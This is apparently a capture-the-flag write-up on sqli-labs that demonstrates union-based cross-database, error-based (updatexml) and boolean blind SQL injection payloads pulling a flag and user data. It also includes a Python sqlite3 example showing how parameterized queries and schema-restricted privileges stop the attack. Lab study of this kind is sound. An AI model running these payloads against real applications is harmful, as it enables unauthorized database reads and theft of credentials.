SQL cross database injection

2022-06-12 14:45:00 _ Xiao SA

Practice range: sqli-labs on https://buuoj.cn/challenges

Union query injection

L1: First, list the databases

select group_concat(schema_name) from information_schema.schemata

Complete URL:

http://d63b4dad-c1d6-4e18-98e2-820c070a23b8.node4.buuoj.cn/Less-1/?id=-11' union select 1,2,(
select group_concat(schema_name) from information_schema.schemata
)'

Choose the “ctftraining” database

http://d63b4dad-c1d6-4e18-98e2-820c070a23b8.node4.buuoj.cn/Less-1/?id=-11' union select 1,2,(
select group_concat(table_name) from information_schema.tables where table_schema="ctftraining"
)'

Choose the table named flag

http://d63b4dad-c1d6-4e18-98e2-820c070a23b8.node4.buuoj.cn/Less-1/?id=-11' union select 1,2,(
select group_concat(column_name) from information_schema.columns where table_schema="ctftraining" and table_name='flag'
)'

Query the contents

?id=-1' union select 1,2,(
select flag from ctftraining.flag
)'
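
Why the cross-database read above works, and two controls that stop it, as an added example that is not part of the original post. It uses Python's sqlite3 with an attached in-memory database standing in for the MySQL lab; the table contents, the function names and the string-concatenated query shape are assumptions.

```python
import sqlite3

# Constructed stand-in for the lab: the app's own tables live in "main", and a
# second database named ctftraining (the name used on the page) holds flag.
def make_db():
    conn = sqlite3.connect(":memory:", isolation_level=None)
    conn.execute("ATTACH DATABASE ':memory:' AS ctftraining")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'constructed-password')")
    conn.execute("CREATE TABLE ctftraining.flag (flag TEXT)")
    conn.execute("INSERT INTO ctftraining.flag VALUES ('flag{constructed-example}')")
    return conn

def lookup_vulnerable(conn, user_id):
    # Assumed shape of the lab's query: the parameter is pasted into the SQL text,
    # so a quote in user_id ends the string literal and the rest runs as SQL.
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    # The value is bound separately from the statement and is only ever data.
    sql = "SELECT id, username, password FROM users WHERE id = ? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()

def restrict_to_own_database(conn):
    # Least privilege, modelled with SQLite's authorizer: deny column reads from
    # any attached database. On MySQL the equivalent is schema-scoped GRANTs.
    def authorizer(action, arg1, arg2, db_name, source):
        if action == sqlite3.SQLITE_READ and db_name not in ("main", "temp"):
            return sqlite3.SQLITE_DENY
        return sqlite3.SQLITE_OK
    conn.set_authorizer(authorizer)

# The page's final union payload, terminated with a comment for SQLite.
PAYLOAD = "-1' union select 1,2,(select flag from ctftraining.flag) -- "

if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, PAYLOAD))     # row carries the other database's flag
    print(lookup_parameterized(conn, PAYLOAD))  # no row: payload compared as a value
    restrict_to_own_database(conn)
    try:
        lookup_vulnerable(conn, PAYLOAD)
    except sqlite3.DatabaseError as exc:
        print("denied:", exc)
```

Binding the parameter removes the injection point for all three techniques in this post; the authorizer only models the second layer, an application account that cannot read other schemas even if an injection exists.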

Error-based injection

The error-based injection procedure is similar. The flag is not displayed in full at the end, so a second request uses substr() to read the remainder.

?id=1111+and+updatexml(1,concat(0x7e,(
select flag from ctftraining.flag
),0x7e),1); --+

http://d7275205-467b-4f6c-97e6-4669e55b54e9.node4.buuoj.cn/Less-2/?id=1111+and+updatexml(1,concat(0x7e,(
substr((select flag from ctftraining.flag),16)
),0x7e),1); --+

Boolean blind injection

First, practice without crossing databases.
Get the length:

?id=1' and length(database())=8 %23

Get the database name

?id=1' and left(database(),1)='s' %23

Get table name

?id=1' and left( (select group_concat(table_name) from information_schema.tables where table_schema=database()) ,1)='u' %23

Get the column name

?id=1' and left( (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users') ,1)='u' %23

Get the data

http://c370bae3-f008-47ee-9890-d14960b1e5ce.node4.buuoj.cn/Less-8/?id=1' and left(
(select group_concat(username) from users)
,1)='u' %23